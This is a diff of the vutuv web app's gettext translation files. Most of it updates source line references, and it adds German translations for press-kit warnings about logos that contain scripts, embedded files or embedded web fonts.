 msgid "the page %{page} itself was reported on vutuv."
 msgstr "die Seite %{page} selbst wurde auf vutuv gemeldet."
 
-#: lib/vutuv_web/components/post_components.ex:3707
+#: lib/vutuv_web/components/post_components.ex:3688
 #, elixir-autogen, elixir-format
 msgid "Found through these servers"
 msgstr "Gefunden über diese Server"
+
+#: lib/vutuv_web/live/press_kit_live.ex:542
+#, elixir-autogen, elixir-format
+msgid "This logo carries a script, in an attribute whose name starts with %{marker}. Whoever downloads it runs that script when they open the file, so export the logo without any interactivity."
+msgstr "Dieses Logo enthält ein Skript, in einem Attribut, dessen Name mit %{marker} beginnt. Wer die Datei herunterlädt und öffnet, führt dieses Skript aus. Bitte exportieren Sie das Logo ohne Interaktivität."
+
+#: lib/vutuv_web/live/press_kit_live.ex:555
+#, elixir-autogen, elixir-format
+msgid "This logo contains %{marker}, which vutuv reads as an embedded file and cannot decode. Remove it, or reword the title or description it sits in."
+msgstr "Dieses Logo enthält %{marker}, was vutuv als eingebettete Datei liest und nicht entschlüsseln kann. Bitte entfernen Sie die Stelle oder formulieren Sie den Titel oder die Beschreibung um, in der sie steht."
+
+#: lib/vutuv_web/live/press_kit_live.ex:549
+#, elixir-autogen, elixir-format
+msgid "This logo has a file embedded in it, usually a web font, that vutuv cannot check. Export it again with the text converted to outlines."
+msgstr "Dieses Logo enthält eine eingebettete Datei, meist eine Web-Schrift, die vutuv nicht prüfen kann. Bitte exportieren Sie es erneut mit in Pfade umgewandelter Schrift."

--- a/priv/gettext/default.pot
+++ b/priv/gettext/default.pot
@@ -121,8 +121,8 @@ msgstr ""
 #: lib/vutuv_web/live/organization_live/edit.ex:378
 #: lib/vutuv_web/live/organization_live/new.ex:222
 #: lib/vutuv_web/live/post_live/composer.ex:2049
-#: lib/vutuv_web/live/press_kit_live.ex:729
-#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:754
+#: lib/vutuv_web/live/press_kit_live.ex:1164
 #: lib/vutuv_web/templates/ad/new.html.heex:136
 #: lib/vutuv_web/templates/admin/legal_page/edit.html.heex:40
 #: lib/vutuv_web/templates/admin/newsletter/form_content.html.heex:57
@@ -165,7 +165,7 @@ msgstr ""
 msgid "Couldn't follow back to %{name}."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4701
+#: lib/vutuv_web/components/post_components.ex:4704
 #: lib/vutuv_web/components/ui.ex:5042
 #: lib/vutuv_web/live/admin/job_live.ex:486
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:621
@@ -213,15 +213,15 @@ msgstr ""
 msgid "Download"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4666
+#: lib/vutuv_web/components/post_components.ex:4669
 #: lib/vutuv_web/components/ui.ex:5033
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:613
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:649
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:150
 #: lib/vutuv_web/live/job_posting_live/show.ex:201
 #: lib/vutuv_web/live/organization_live/show.ex:159
-#: lib/vutuv_web/live/press_kit_live.ex:691
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:716
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #: lib/vutuv_web/templates/admin/legal_page/index.html.heex:50
 #: lib/vutuv_web/templates/admin/newsletter/edit.html.heex:7
 #: lib/vutuv_web/templates/admin/newsletter/show.html.heex:19
@@ -622,8 +622,8 @@ msgstr ""
 #: lib/vutuv_web/components/ui.ex:4934
 #: lib/vutuv_web/live/organization_live/edit.ex:376
 #: lib/vutuv_web/live/post_live/composer.ex:2376
-#: lib/vutuv_web/live/press_kit_live.ex:727
-#: lib/vutuv_web/live/press_kit_live.ex:1138
+#: lib/vutuv_web/live/press_kit_live.ex:752
+#: lib/vutuv_web/live/press_kit_live.ex:1163
 #: lib/vutuv_web/templates/admin/pref/index.html.heex:71
 #: lib/vutuv_web/templates/admin/user_pref/show.html.heex:84
 #: lib/vutuv_web/templates/settings/apps.html.heex:63
@@ -657,7 +657,7 @@ msgstr ""
 #: lib/vutuv_web/live/search_live.ex:680
 #: lib/vutuv_web/live/shell_live.ex:1495
 #: lib/vutuv_web/live/shell_live.ex:1702
-#: lib/vutuv_web/live/tag_live/timeline.ex:353
+#: lib/vutuv_web/live/tag_live/timeline.ex:354
 #: lib/vutuv_web/templates/admin/account/index.html.heex:23
 #: lib/vutuv_web/templates/admin/account/index.html.heex:35
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:30
@@ -1189,7 +1189,7 @@ msgstr ""
 msgid "All tag urls"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5319
+#: lib/vutuv_web/components/post_components.ex:5322
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:2
 #: lib/vutuv_web/templates/tag/index.html.heex:1
 #: lib/vutuv_web/templates/user/show.html.heex:643
@@ -2081,7 +2081,7 @@ msgstr ""
 #: lib/vutuv_web/live/post_live/composer.ex:2147
 #: lib/vutuv_web/live/post_live/composer.ex:2170
 #: lib/vutuv_web/live/post_live/composer.ex:2196
-#: lib/vutuv_web/live/press_kit_live.ex:1307
+#: lib/vutuv_web/live/press_kit_live.ex:1332
 #, elixir-autogen, elixir-format
 msgid "Cancel upload"
 msgstr ""
@@ -2091,7 +2091,7 @@ msgstr ""
 msgid "Delete post"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4698
+#: lib/vutuv_web/components/post_components.ex:4701
 #: lib/vutuv_web/live/post_live/edit.ex:151
 #, elixir-autogen, elixir-format
 msgid "Delete this post permanently?"
@@ -2107,7 +2107,7 @@ msgstr ""
 #: lib/vutuv_web/gettext_extraction_anchors.ex:87
 #: lib/vutuv_web/live/organization_live/feed.ex:203
 #: lib/vutuv_web/live/post_live/feed.ex:366
-#: lib/vutuv_web/live/post_live/feed.ex:3594
+#: lib/vutuv_web/live/post_live/feed.ex:3592
 #: lib/vutuv_web/live/post_live/feed_calendar.ex:46
 #: lib/vutuv_web/live/shell_live.ex:1346
 #: lib/vutuv_web/live/shell_live.ex:1692
@@ -2136,8 +2136,8 @@ msgstr ""
 msgid "Hide this post from…"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4644
-#: lib/vutuv_web/components/post_components.ex:4646
+#: lib/vutuv_web/components/post_components.ex:4647
+#: lib/vutuv_web/components/post_components.ex:4649
 #, elixir-autogen, elixir-format
 msgid "Limited audience"
 msgstr ""
@@ -2153,7 +2153,7 @@ msgstr ""
 msgid "No more than %{max} images per post."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3935
+#: lib/vutuv_web/live/post_live/feed.ex:3933
 #, elixir-autogen, elixir-format
 msgid "Nothing here yet. Follow people to fill your feed, or write your first post."
 msgstr ""
@@ -2184,7 +2184,7 @@ msgstr ""
 msgid "Post deleted successfully."
 msgstr ""
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:243
+#: lib/vutuv_web/agent_docs/post_doc.ex:244
 #: lib/vutuv_web/controllers/post_controller.ex:69
 #: lib/vutuv_web/controllers/post_controller.ex:90
 #: lib/vutuv_web/controllers/user_controller.ex:77
@@ -2202,13 +2202,13 @@ msgstr ""
 msgid "Posts"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5192
-#: lib/vutuv_web/components/post_components.ex:5196
+#: lib/vutuv_web/components/post_components.ex:5195
+#: lib/vutuv_web/components/post_components.ex:5199
 #, elixir-autogen, elixir-format
 msgid "Read more"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5193
+#: lib/vutuv_web/components/post_components.ex:5196
 #: lib/vutuv_web/live/fediverse_account_live.ex:394
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:146
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:236
@@ -2230,7 +2230,7 @@ msgstr ""
 #: lib/vutuv_web/live/post_live/saved.ex:666
 #: lib/vutuv_web/live/post_live/saved.ex:694
 #: lib/vutuv_web/live/post_rewrites_live.ex:376
-#: lib/vutuv_web/live/press_kit_live.ex:1065
+#: lib/vutuv_web/live/press_kit_live.ex:1090
 #: lib/vutuv_web/templates/connection/index.html.heex:45
 #: lib/vutuv_web/views/settings_html.ex:386
 #, elixir-autogen, elixir-format
@@ -2262,7 +2262,7 @@ msgstr ""
 #: lib/vutuv_web/attachment_text.ex:73
 #: lib/vutuv_web/live/post_live/composer.ex:1615
 #: lib/vutuv_web/live/post_live/composer.ex:1720
-#: lib/vutuv_web/live/press_kit_live.ex:541
+#: lib/vutuv_web/live/press_kit_live.ex:566
 #, elixir-autogen, elixir-format
 msgid "That file could not be processed."
 msgstr ""
@@ -2306,27 +2306,27 @@ msgstr ""
 msgid "What's new? Markdown is supported."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4641
+#: lib/vutuv_web/components/post_components.ex:4644
 #, elixir-autogen, elixir-format
 msgid "edited"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6959
+#: lib/vutuv_web/components/post_components.ex:6962
 #, elixir-autogen, elixir-format
 msgid "everyone else"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6963
+#: lib/vutuv_web/components/post_components.ex:6966
 #, elixir-autogen, elixir-format
 msgid "logged-out visitors"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6961
+#: lib/vutuv_web/components/post_components.ex:6964
 #, elixir-autogen, elixir-format
 msgid "people who don't follow you"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6962
+#: lib/vutuv_web/components/post_components.ex:6965
 #, elixir-autogen, elixir-format
 msgid "people you don't follow"
 msgstr ""
@@ -2373,7 +2373,7 @@ msgid "All posts"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2186
-#: lib/vutuv_web/components/post_components.ex:7062
+#: lib/vutuv_web/components/post_components.ex:7065
 #: lib/vutuv_web/components/ui.ex:4476
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2392,7 +2392,7 @@ msgid "Bookmarks"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2130
-#: lib/vutuv_web/components/post_components.ex:7303
+#: lib/vutuv_web/components/post_components.ex:7279
 #: lib/vutuv_web/components/ui.ex:4462
 #: lib/vutuv_web/notification_line.ex:342
 #: lib/vutuv_web/views/user_html.ex:486
@@ -2401,7 +2401,7 @@ msgid "Like"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1301
-#: lib/vutuv_web/components/post_components.ex:7313
+#: lib/vutuv_web/components/post_components.ex:7289
 #: lib/vutuv_web/live/post_live/saved.ex:193
 #: lib/vutuv_web/live/post_live/saved.ex:526
 #: lib/vutuv_web/live/shell_live.ex:1596
@@ -2422,13 +2422,13 @@ msgstr ""
 msgid "Nothing here yet. Posts you like show up here."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7050
+#: lib/vutuv_web/components/post_components.ex:7053
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be reposted."
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2185
-#: lib/vutuv_web/components/post_components.ex:7061
+#: lib/vutuv_web/components/post_components.ex:7064
 #: lib/vutuv_web/live/post_live/saved.ex:822
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2436,26 +2436,26 @@ msgid "Remove bookmark"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2166
-#: lib/vutuv_web/components/post_components.ex:7046
+#: lib/vutuv_web/components/post_components.ex:7049
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:168
 #, elixir-autogen, elixir-format
 msgid "Repost"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2759
-#: lib/vutuv_web/components/post_components.ex:6065
+#: lib/vutuv_web/components/post_components.ex:6068
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name}"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2165
-#: lib/vutuv_web/components/post_components.ex:7045
+#: lib/vutuv_web/components/post_components.ex:7048
 #, elixir-autogen, elixir-format
 msgid "Undo repost"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2129
-#: lib/vutuv_web/components/post_components.ex:7302
+#: lib/vutuv_web/components/post_components.ex:7278
 #: lib/vutuv_web/live/post_live/saved.ex:821
 #: lib/vutuv_web/views/user_html.ex:486
 #, elixir-autogen, elixir-format
@@ -2483,7 +2483,7 @@ msgstr ""
 msgid "Welcome to vutuv!"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7357
+#: lib/vutuv_web/components/post_components.ex:7333
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be answered."
 msgstr ""
@@ -2495,8 +2495,8 @@ msgid "Replies"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2375
-#: lib/vutuv_web/components/post_components.ex:7340
-#: lib/vutuv_web/components/post_components.ex:7341
+#: lib/vutuv_web/components/post_components.ex:7316
+#: lib/vutuv_web/components/post_components.ex:7317
 #: lib/vutuv_web/live/notification_live/index.ex:993
 #: lib/vutuv_web/live/post_live/reply.ex:49
 #: lib/vutuv_web/notification_line.ex:339
@@ -2504,7 +2504,7 @@ msgstr ""
 msgid "Reply"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4600
+#: lib/vutuv_web/components/post_components.ex:4603
 #, elixir-autogen, elixir-format
 msgid "Reply to a deleted post"
 msgstr ""
@@ -2525,7 +2525,7 @@ msgstr ""
 msgid "replied to your post."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4118
+#: lib/vutuv_web/components/post_components.ex:4121
 #: lib/vutuv_web/live/post_live/remote_post_reply.ex:63
 #: lib/vutuv_web/live/post_live/remote_reply.ex:61
 #: lib/vutuv_web/live/post_live/reply.ex:63
@@ -2533,14 +2533,14 @@ msgstr ""
 msgid "Reply to %{handle}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4572
+#: lib/vutuv_web/components/post_components.ex:4575
 #, elixir-autogen, elixir-format
 msgid "Reply to a now-deleted post by %{handle}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4563
-#: lib/vutuv_web/components/post_components.ex:4592
+#: lib/vutuv_web/components/post_components.ex:4566
 #: lib/vutuv_web/components/post_components.ex:4595
+#: lib/vutuv_web/components/post_components.ex:4598
 #, elixir-autogen, elixir-format
 msgid "Replying to %{handle}"
 msgstr ""
@@ -2840,7 +2840,7 @@ msgid_plural "connections"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:6960
+#: lib/vutuv_web/components/post_components.ex:6963
 #, elixir-autogen, elixir-format
 msgid "people who aren't your connections"
 msgstr ""
@@ -3092,7 +3092,7 @@ msgstr ""
 msgid "Only visible to you"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4539
+#: lib/vutuv_web/components/post_components.ex:4542
 #, elixir-autogen, elixir-format
 msgid "Only you can see this post while a report about it is handled."
 msgstr ""
@@ -3152,8 +3152,8 @@ msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:1467
 #: lib/vutuv_web/components/post_components.ex:3419
-#: lib/vutuv_web/components/post_components.ex:3627
-#: lib/vutuv_web/components/post_components.ex:4769
+#: lib/vutuv_web/components/post_components.ex:3631
+#: lib/vutuv_web/components/post_components.ex:4772
 #: lib/vutuv_web/live/organization_live/show.ex:684
 #: lib/vutuv_web/templates/user/show.html.heex:252
 #, elixir-autogen, elixir-format
@@ -3864,7 +3864,7 @@ msgstr ""
 msgid "People %{name} follows"
 msgstr ""
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:244
+#: lib/vutuv_web/agent_docs/post_doc.ex:245
 #, elixir-autogen, elixir-format
 msgid "Post archive of %{name}"
 msgstr ""
@@ -4495,7 +4495,7 @@ msgstr ""
 msgid "You unblocked @%{slug}."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3940
+#: lib/vutuv_web/live/post_live/feed.ex:3938
 #, elixir-autogen, elixir-format
 msgid "Discover people to follow"
 msgstr ""
@@ -5372,9 +5372,9 @@ msgstr ""
 msgid "Footer navigation"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4849
-#: lib/vutuv_web/components/post_components.ex:5458
-#: lib/vutuv_web/components/post_components.ex:5796
+#: lib/vutuv_web/components/post_components.ex:4852
+#: lib/vutuv_web/components/post_components.ex:5461
+#: lib/vutuv_web/components/post_components.ex:5799
 #: lib/vutuv_web/live/notification_live/index.ex:1069
 #: lib/vutuv_web/views/user_html.ex:133
 #, elixir-autogen, elixir-format
@@ -5415,7 +5415,7 @@ msgstr ""
 msgid "Type of email address"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:628
+#: lib/vutuv_web/live/press_kit_live.ex:653
 #: lib/vutuv_web/templates/user/edit.html.heex:256
 #, elixir-autogen, elixir-format
 msgid "About you"
@@ -5740,7 +5740,7 @@ msgid "Name (A-Z)"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/saved.ex:507
-#: lib/vutuv_web/live/tag_live/timeline.ex:453
+#: lib/vutuv_web/live/tag_live/timeline.ex:454
 #, elixir-autogen, elixir-format
 msgid "Newest first"
 msgstr ""
@@ -5766,7 +5766,7 @@ msgid "Nothing here yet. People you like show up here."
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/saved.ex:508
-#: lib/vutuv_web/live/tag_live/timeline.ex:454
+#: lib/vutuv_web/live/tag_live/timeline.ex:455
 #, elixir-autogen, elixir-format
 msgid "Oldest first"
 msgstr ""
@@ -5788,7 +5788,7 @@ msgid "Search saved items"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/saved.ex:570
-#: lib/vutuv_web/live/tag_live/timeline.ex:369
+#: lib/vutuv_web/live/tag_live/timeline.ex:370
 #, elixir-autogen, elixir-format
 msgid "Sort"
 msgstr ""
@@ -6180,7 +6180,7 @@ msgid "View all phone numbers"
 msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:235
-#: lib/vutuv_web/live/press_kit_live.ex:979
+#: lib/vutuv_web/live/press_kit_live.ex:1004
 #: lib/vutuv_web/live/section_reorder_live.ex:128
 #, elixir-autogen, elixir-format
 msgid "Drag to reorder"
@@ -6193,7 +6193,7 @@ msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:267
 #: lib/vutuv_web/live/post_rewrites_live.ex:364
-#: lib/vutuv_web/live/press_kit_live.ex:1041
+#: lib/vutuv_web/live/press_kit_live.ex:1066
 #: lib/vutuv_web/live/section_reorder_live.ex:156
 #, elixir-autogen, elixir-format
 msgid "Move down"
@@ -6201,7 +6201,7 @@ msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:256
 #: lib/vutuv_web/live/post_rewrites_live.ex:352
-#: lib/vutuv_web/live/press_kit_live.ex:1030
+#: lib/vutuv_web/live/press_kit_live.ex:1055
 #: lib/vutuv_web/live/section_reorder_live.ex:147
 #, elixir-autogen, elixir-format
 msgid "Move up"
@@ -6566,8 +6566,8 @@ msgid "Turn a switch off and the matching opt-out rides along on the pages and r
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:3346
-#: lib/vutuv_web/components/post_components.ex:4722
-#: lib/vutuv_web/components/post_components.ex:4736
+#: lib/vutuv_web/components/post_components.ex:4725
+#: lib/vutuv_web/components/post_components.ex:4739
 #: lib/vutuv_web/components/ui.ex:3226
 #: lib/vutuv_web/live/fediverse_account_live.ex:437
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -6595,7 +6595,7 @@ msgstr ""
 msgid "Remove this connection? You will stop following them."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4722
+#: lib/vutuv_web/components/post_components.ex:4725
 #: lib/vutuv_web/components/ui.ex:3225
 #: lib/vutuv_web/live/fediverse_account_live.ex:435
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -6789,7 +6789,7 @@ msgid "Filter"
 msgstr ""
 
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:591
-#: lib/vutuv_web/live/tag_live/timeline.ex:335
+#: lib/vutuv_web/live/tag_live/timeline.ex:336
 #, elixir-autogen, elixir-format
 msgid "Filters"
 msgstr ""
@@ -7288,7 +7288,7 @@ msgid "applies to the whole list, not just this page"
 msgstr ""
 
 #: lib/vutuv_web/components/job_components.ex:190
-#: lib/vutuv_web/components/post_components.ex:7213
+#: lib/vutuv_web/components/post_components.ex:7189
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:980
 #: lib/vutuv_web/live/shell_live.ex:1830
 #, elixir-autogen, elixir-format
@@ -7393,9 +7393,9 @@ msgstr ""
 #: lib/vutuv_web/components/welcome_components.ex:362
 #: lib/vutuv_web/live/admin/media_live.ex:270
 #: lib/vutuv_web/live/admin/newsletter_broadcast_live.ex:174
-#: lib/vutuv_web/live/post_live/feed.ex:4234
+#: lib/vutuv_web/live/post_live/feed.ex:4232
 #: lib/vutuv_web/live/post_rewrites_live.ex:447
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #, elixir-autogen
 msgid "Done"
 msgstr ""
@@ -7857,7 +7857,7 @@ msgstr ""
 #: lib/vutuv_web/live/admin/media_live.ex:146
 #: lib/vutuv_web/live/admin/user_live.ex:184
 #: lib/vutuv_web/live/job_board_live.ex:319
-#: lib/vutuv_web/live/tag_live/timeline.ex:399
+#: lib/vutuv_web/live/tag_live/timeline.ex:400
 #, elixir-autogen, elixir-format
 msgid "Clear filters"
 msgstr ""
@@ -8734,7 +8734,7 @@ msgstr ""
 msgid "CV download"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6068
+#: lib/vutuv_web/components/post_components.ex:6071
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name} and %{formatted} other"
 msgid_plural "Reposted by %{name} and %{formatted} others"
@@ -11996,7 +11996,7 @@ msgid "Everyone (public)"
 msgstr ""
 
 #: lib/vutuv_web/live/job_posting_live/form.ex:681
-#: lib/vutuv_web/live/tag_live/timeline.ex:380
+#: lib/vutuv_web/live/tag_live/timeline.ex:381
 #: lib/vutuv_web/templates/education/form_content.html.heex:41
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:63
 #, elixir-autogen, elixir-format
@@ -12936,7 +12936,7 @@ msgstr ""
 msgid "Stop e-mail alerts for your saved search \"%{label}\"?"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4077
+#: lib/vutuv_web/components/post_components.ex:4080
 #: lib/vutuv_web/components/saved_search_components.ex:43
 #: lib/vutuv_web/controllers/settings_controller.ex:788
 #: lib/vutuv_web/controllers/settings_controller.ex:806
@@ -13326,7 +13326,7 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:259
 #: lib/vutuv_web/agent_docs/text.ex:221
-#: lib/vutuv_web/live/tag_live/timeline.ex:283
+#: lib/vutuv_web/live/tag_live/timeline.ex:284
 #, elixir-autogen, elixir-format
 msgid "Posts with this tag"
 msgstr ""
@@ -13536,34 +13536,34 @@ msgstr ""
 msgid "added %{count} new entries to their CV:"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6756
+#: lib/vutuv_web/components/post_components.ex:6759
 #, elixir-autogen, elixir-format
 msgid "Audiobook"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6713
+#: lib/vutuv_web/components/post_components.ex:6716
 #, elixir-autogen, elixir-format
 msgid "Book review"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6757
+#: lib/vutuv_web/components/post_components.ex:6760
 #, elixir-autogen, elixir-format
 msgid "Cinema"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6759
+#: lib/vutuv_web/components/post_components.ex:6762
 #, elixir-autogen, elixir-format
 msgid "DVD/Blu-ray"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6755
+#: lib/vutuv_web/components/post_components.ex:6758
 #, elixir-autogen, elixir-format
 msgid "E-book"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6712
+#: lib/vutuv_web/components/post_components.ex:6715
 #, elixir-autogen, elixir-format
 msgid "Film review"
 msgstr ""
@@ -13574,12 +13574,12 @@ msgstr ""
 msgid "Look up"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6754
+#: lib/vutuv_web/components/post_components.ex:6757
 #, elixir-autogen, elixir-format
 msgid "Printed book"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6758
+#: lib/vutuv_web/components/post_components.ex:6761
 #, elixir-autogen, elixir-format
 msgid "Streaming"
 msgstr ""
@@ -13599,7 +13599,7 @@ msgstr ""
 msgid "Year"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6795
+#: lib/vutuv_web/components/post_components.ex:6798
 #: lib/vutuv_web/views/job_reference_html.ex:180
 #, elixir-autogen, elixir-format
 msgid "%{formatted} page"
@@ -13607,30 +13607,30 @@ msgid_plural "%{formatted} pages"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:6825
+#: lib/vutuv_web/components/post_components.ex:6828
 #: lib/vutuv_web/components/ui.ex:3884
 #, elixir-autogen, elixir-format
 msgid "%{hours} h"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6826
+#: lib/vutuv_web/components/post_components.ex:6829
 #: lib/vutuv_web/components/ui.ex:3885
 #, elixir-autogen, elixir-format
 msgid "%{hours} h %{minutes} min"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6824
+#: lib/vutuv_web/components/post_components.ex:6827
 #: lib/vutuv_web/components/ui.ex:3877
 #, elixir-autogen, elixir-format
 msgid "%{minutes} min"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6784
+#: lib/vutuv_web/components/post_components.ex:6787
 #, elixir-autogen, elixir-format
 msgid "(print edition)"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6831
+#: lib/vutuv_web/components/post_components.ex:6834
 #, elixir-autogen, elixir-format
 msgid "approx. %{duration}"
 msgstr ""
@@ -13660,7 +13660,7 @@ msgstr ""
 msgid "With qualification: %{name}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6598
+#: lib/vutuv_web/components/post_components.ex:6601
 #, elixir-autogen, elixir-format
 msgid "Publisher:"
 msgstr ""
@@ -13703,7 +13703,7 @@ msgstr ""
 msgid "endorsed you for %{tags}."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6589
+#: lib/vutuv_web/components/post_components.ex:6592
 #, elixir-autogen, elixir-format
 msgid "by:"
 msgstr ""
@@ -14050,14 +14050,14 @@ msgstr ""
 msgid "See all frozen accounts"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4366
+#: lib/vutuv_web/components/post_components.ex:4369
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} earlier post"
 msgid_plural "Show %{formatted} earlier posts"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:4389
+#: lib/vutuv_web/components/post_components.ex:4392
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} more reply"
 msgid_plural "Show %{formatted} more replies"
@@ -14084,7 +14084,7 @@ msgstr ""
 msgid "Type a name, @handle or email to find an account to freeze."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7312
+#: lib/vutuv_web/components/post_components.ex:7288
 #, elixir-autogen, elixir-format
 msgid "You can't like your own post."
 msgstr ""
@@ -14798,7 +14798,7 @@ msgstr ""
 msgid "ZIP or postal code"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:387
+#: lib/vutuv_web/live/tag_live/timeline.ex:388
 #: lib/vutuv_web/templates/education/form_content.html.heex:59
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:81
 #, elixir-autogen, elixir-format
@@ -15229,7 +15229,7 @@ msgstr ""
 msgid "Your public posts are copied to other servers. Once a copy is there we cannot delete it, we cannot change it, and we cannot see where it travels next. Editing or deleting a post on vutuv is only a request to those servers, and not every server honours it."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7258
+#: lib/vutuv_web/components/post_components.ex:7234
 #: lib/vutuv_web/live/notification_live/index.ex:1592
 #, elixir-autogen, elixir-format
 msgid "%{formatted} reply"
@@ -15237,7 +15237,7 @@ msgid_plural "%{formatted} replies"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:7262
+#: lib/vutuv_web/components/post_components.ex:7238
 #: lib/vutuv_web/live/notification_live/index.ex:1586
 #, elixir-autogen, elixir-format
 msgid "%{formatted} like"
@@ -15245,7 +15245,7 @@ msgid_plural "%{formatted} likes"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:7266
+#: lib/vutuv_web/components/post_components.ex:7242
 #, elixir-autogen, elixir-format
 msgid "%{formatted} repost"
 msgid_plural "%{formatted} reposts"
@@ -15253,7 +15253,7 @@ msgstr[0] ""
 msgstr[1] ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1339
-#: lib/vutuv_web/components/post_components.ex:7217
+#: lib/vutuv_web/components/post_components.ex:7193
 #, elixir-autogen, elixir-format
 msgid "Already counted in the numbers above."
 msgstr ""
@@ -15351,8 +15351,8 @@ msgstr ""
 #: lib/vutuv_web/agent_docs/markdown.ex:1539
 #: lib/vutuv_web/components/post_components.ex:1503
